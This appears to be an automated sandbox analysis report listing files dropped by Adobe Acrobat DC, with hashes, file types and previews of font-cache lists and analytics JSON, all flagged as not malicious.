                                                                                                                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:PostScript document text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10880
                                                                                                                                                                                                        Entropy (8bit):5.214360287289079
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7800

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:PostScript document text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10880
                                                                                                                                                                                                        Entropy (8bit):5.214360287289079
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):295
                                                                                                                                                                                                        Entropy (8bit):5.368117976048216
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJM3g98kUwPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGMbLUkee9
                                                                                                                                                                                                        MD5:E5B50ADF112EC93108650A51C34647F2
                                                                                                                                                                                                        SHA1:D3AAFC66EC5E6E60F9A8D50E71AA0FAA42599759
                                                                                                                                                                                                        SHA-256:10652098586A147299C2A99D39F7F34B70F0A481E5693D308D4AA49CE707FDFB
                                                                                                                                                                                                        SHA-512:684A3D38C62FB82D258AA3CC51BA6FC48B56DEC73810C6A3EE0E0BB988551672A9947E9506F49B2048581E538162FFAE943DB4962BB5C98AA96BA0D1896FF702
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):294
                                                                                                                                                                                                        Entropy (8bit):5.3017160758583595
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJfBoTfXpnrPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGWTfXcUkee9
                                                                                                                                                                                                        MD5:069CB7184AEDB84598B4BA97E80AC72F
                                                                                                                                                                                                        SHA1:D9ED6C64A5B0EC498F822C052C78220010D62C02
                                                                                                                                                                                                        SHA-256:07F69FB4CD9FE695607E43564940720646BCFF7D585EDC100244540DE8CE70B6
                                                                                                                                                                                                        SHA-512:F5C33BC2AAB9BCB254023CBC949F3DDF32A5B762A38EE2A5B4D720D9CB8FA2019754F54EF784B6F5411F304CDDA6350A74B10EB252F76BD1EB0A990DFE136014
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):294
                                                                                                                                                                                                        Entropy (8bit):5.280711111253435
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJfBD2G6UpnrPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGR22cUkee9
                                                                                                                                                                                                        MD5:47AE140A6CC73825C87A4C6BC6FB3C2C
                                                                                                                                                                                                        SHA1:37721B183CF17C09EA51D7F0621B88CE5BB53434
                                                                                                                                                                                                        SHA-256:68C1AE05AA7A8999BA97646A33A21CDEF17CBC7C2F340C3AF4C8702147348A1D
                                                                                                                                                                                                        SHA-512:1BF5F4546599E1B6189FD091A358A4E00C5EC786730BA231C9457E31D981D761B935D31B589AF9AFF2A558C752E4460C367F9752681B9062A5523625DD2A2C29
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):285
                                                                                                                                                                                                        Entropy (8bit):5.355163106912892
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJfPmwrPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGH56Ukee9
                                                                                                                                                                                                        MD5:98270EC6639992233B6ECFDF582D6F6F
                                                                                                                                                                                                        SHA1:8DBBBA05B8661D0FF3850CFF891C2AC7F555146C
                                                                                                                                                                                                        SHA-256:17138E190D4B489994005F9F4392AAF0C86842D0BDE02545B1F4BA633D87D9A2
                                                                                                                                                                                                        SHA-512:4AA90EB99B13A46F750166F2CD893DC0BDA5E70A7B6B3CFE1F4BB1118E47937E9F2EF1EF67512099B2E10C26566DC3EF56CBAD4C4D8548C9B96A58D1A1FF9A8F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1123
                                                                                                                                                                                                        Entropy (8bit):5.690425786583737
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:Yv6XGRXymeOU/pLgE9cQx8LennAvzBvkn0RCmK8czOCCSc:YvvNxel/hgy6SAFv5Ah8cv/c
                                                                                                                                                                                                        MD5:F19FAA406E183BAC9B9762B831018274
                                                                                                                                                                                                        SHA1:0915F14F9D77AABF13C07BA9D8435861C4EAB230
                                                                                                                                                                                                        SHA-256:15B7B96787694DFA75778BEDA61CC19851EE10F22E2D10F7C50314CC683CF0F8
                                                                                                                                                                                                        SHA-512:8D4F5428C8C178254D35ADABD6E898F2ACA4428E16A95E89869A32CEC95591DEBB25B98DA615C4218420226A4CA69FB3B629965CD7528200FE455D4284D082B5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):289
                                                                                                                                                                                                        Entropy (8bit):5.289550436616728
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJf8dPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGU8Ukee9
                                                                                                                                                                                                        MD5:45264BF9DFE6C4A819F0155D4FB78B89
                                                                                                                                                                                                        SHA1:5BE96A37D6017B98A215894D70ADD761001A3B1B
                                                                                                                                                                                                        SHA-256:D18423085501A8A26F28EE74F5E39A433DA23EAC0B051547A96B6F13A5C5B614
                                                                                                                                                                                                        SHA-512:9B11D3C4C433554298E32933F09159411C796764EB7BE9462D6A248A9A29EC05B1D6D20A15B98832F7927BB050DA0B8521C22A68ACA6BB137299BE9C286A018E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):292
                                                                                                                                                                                                        Entropy (8bit):5.293849230164351
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJfQ1rPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGY16Ukee9
                                                                                                                                                                                                        MD5:967FF337AE5DBC1CEAFF37BDAB17A410
                                                                                                                                                                                                        SHA1:3A71301982B8E065EBDF847477D1B8A23183767A
                                                                                                                                                                                                        SHA-256:AA6D6FAAD6C0C1E901A779C73E2823D25F42CEEB804D20DDF292ADEFFABD9F3B
                                                                                                                                                                                                        SHA-512:1A32F7DD487B91EB076886281D5A0D9CAB8F5FD7F79A7F91332F0270855643CD370438517E7EAD416D3E8078066093C21B779712D872D9411D8995A5BB09F3FE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):289
                                                                                                                                                                                                        Entropy (8bit):5.307675704511916
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJfFldPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGz8Ukee9
                                                                                                                                                                                                        MD5:600366599F74039A7FD994AA23C7BA07
                                                                                                                                                                                                        SHA1:5D7A5364CD790F162A5D4DF253E9CCFEE9319864
                                                                                                                                                                                                        SHA-256:4D540F7D29D10C8A3D9C338AF80A3A8949ED14D7411246B651A72EE0B6BC9F17
                                                                                                                                                                                                        SHA-512:F98BD7536EEBB3A75DA8AEC6562C1EAF8485974B70E0149A4416CC2FA81725ADB1E53AE97ADD54C4C58A34D540B445F17F890CE941E0C0612539D7A2F32C640C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):295
                                                                                                                                                                                                        Entropy (8bit):5.315133323935859
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJfzdPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGb8Ukee9
                                                                                                                                                                                                        MD5:2284CA67F4CD7F08BCAE52F91B856E17
                                                                                                                                                                                                        SHA1:339631F72C461ED36184CD0CE4125E2863D76763
                                                                                                                                                                                                        SHA-256:25AAAD9B83528626BEEAF3EC09E82E4BA2ECD3CBC66A8B81AE616B31F8E4AEEF
                                                                                                                                                                                                        SHA-512:B6824F610C2F120173AAB5E3431AFFA2289127214C58B0C166EE4E7789BD2D3A088AC87D2582320069698344BC3611013388E4243977100F548116749497771B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):289
                                                                                                                                                                                                        Entropy (8bit):5.295966717999733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJfYdPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGg8Ukee9
                                                                                                                                                                                                        MD5:9D5229472FF02A5A7D6F0BF4D9325161
                                                                                                                                                                                                        SHA1:04B721A059B187AB2388718EFB605EC06432D4F6
                                                                                                                                                                                                        SHA-256:E815A11DA6CE546613E1E883E40D02DED80F5FD52380D45557E2E41751091204
                                                                                                                                                                                                        SHA-512:448D4917493DEE7EBEF46F2EF1FA7315B3C087691C226A9B2A2069D1410D22F52EB69B00ACB181317CE9510904C66A193BF553533EC20C0D7C84689DCD95F35B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):284
                                                                                                                                                                                                        Entropy (8bit):5.2822450732643285
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJf+dPeUkwRe9:YvXKXGy8XDGPsdTeOU9wG28Ukee9
                                                                                                                                                                                                        MD5:BAB28482FFD337A6A42BEF98583BFF88
                                                                                                                                                                                                        SHA1:8657F8454C6571D50BC794E512FDD4EC74908E59
                                                                                                                                                                                                        SHA-256:B290CE0BEB68BB1ED65C835E712CEFC7F9657620AA0CCD9C4D348B1EB0C3E27D
                                                                                                                                                                                                        SHA-512:ED3D27E199F3720038E43FEFAB0E0C98824B7AE723F33263064FA0F5E75AB7E913E056992AFCB52DA372897FDB05383AC3F5C34B68EE9FDF578D29E67A6AC9C3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):291
                                                                                                                                                                                                        Entropy (8bit):5.279541535824802
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJfbPtdPeUkwRe9:YvXKXGy8XDGPsdTeOU9wGDV8Ukee9
                                                                                                                                                                                                        MD5:08CE4737B95650D9F759EAFB4708D94D
                                                                                                                                                                                                        SHA1:EAAE25BD134044E872B1036E1DDDA874DA562E7C
                                                                                                                                                                                                        SHA-256:1C056F5269C8AF2CA2ACA784429FE8C0E02C62F79649529CB2B45FFA43162BCC
                                                                                                                                                                                                        SHA-512:1EF5FDC08CA51373FF59ED13D8DD05A6A5B70F846EAAD29537FF338D07FDB60B6293548FEED9F66FCC6D6F5B6E5515D9178E1185DC3E62CD7EC445EB81D07B28
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):287
                                                                                                                                                                                                        Entropy (8bit):5.284433027401981
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YEQXJ2HXGy8XDGq7WsGiIPEeOF0Y09lxoAvJf21rPeUkwRe9:YvXKXGy8XDGPsdTeOU9wG+16Ukee9
                                                                                                                                                                                                        MD5:6FCD74AA8A358627331E2210A45ED9F2
                                                                                                                                                                                                        SHA1:B8EC4171065FC2493B80071AFDE36D6608648597
                                                                                                                                                                                                        SHA-256:781DC51EC5B7209ADD98B23927BE1EB86E2AFA89710F84505C1539E5B4507D34
                                                                                                                                                                                                        SHA-512:EC3C5C3362D9724F9DEF31AE2F7801913B29739DBC9F1231DE50A2B1ECC8E5549EAB298371A3D2945ACBDEF64EB938FEA53E2A4EC551A59E2786B1A64AEE9BE9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"analyticsData":{"responseGUID":"f2e03136-47ea-48df-9d5f-f706c1aad918","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734968647781,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1090
                                                                                                                                                                                                        Entropy (8bit):5.66619206612838
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:Yv6XGRXymeOUnamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSc:YvvNxel/BgkDMUJUAh8cvMc
                                                                                                                                                                                                        MD5:3942D6D6B110BE46D2FED867A7332AD5
                                                                                                                                                                                                        SHA1:E7032F3DAD27052F17C4D354522340148F22BFA8
                                                                                                                                                                                                        SHA-256:6CD5083933A9606550CDD7E76A0E606568B1391FB033CF6E44158CDDE0C21D87
                                                                                                                                                                                                        SHA-512:F32ECDA9DF18FD65F9C5AAC9FCE27FADC1EA40393F2A35BEA5470AFDA3AB0848112D9752C6832F07F9C76E43B420B01BA7A3E25AE1E670EF85BE81E156FB9111
                                                                                                                                                                                                        Malicious:false
